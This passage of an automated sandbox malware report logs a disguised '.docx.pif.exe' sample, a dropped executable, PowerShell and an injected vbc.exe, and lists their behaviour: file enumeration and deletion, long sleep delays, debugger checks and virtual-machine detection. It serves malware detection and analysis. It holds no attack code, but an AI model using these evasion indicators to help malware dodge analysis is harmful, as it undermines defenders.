                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040F7A7 Sleep,ExitProcess,15_2_0040F7A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: \Device\RasAcd count: 189384Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 4740000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 77E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 6C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 87E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 97E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: AB50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: BB50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: CDA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: DDA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: EDA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: F470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 12A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 4A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 72D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 82D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 8460000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 9460000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 9780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: A780000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 72D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 8460000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMemory allocated: 9780000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A748
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6847Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 613Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7295Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 4819Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: foregroundWindowGot 1728Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 6.1 %
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe TID: 1856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4284Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5580Thread sleep count: 114 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5580Thread sleep time: -57000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616Thread sleep count: 390 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616Thread sleep time: -1170000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748Thread sleep count: 121 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748Thread sleep time: -121000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616Thread sleep count: 4819 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4616Thread sleep time: -14457000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748Thread sleep count: 295 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 4748Thread sleep time: -295000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe TID: 4196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407C97
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: TkdxROLUOVpK.exe, 0000000A.00000002.2137224054.0000000006D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11de
                Source: vbc.exe, 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h]15_2_004432B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00412077 GetProcessHeap,HeapFree,15_2_00412077
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00434B47 SetUnhandledExceptionFilter,15_2_00434B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434FDC
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
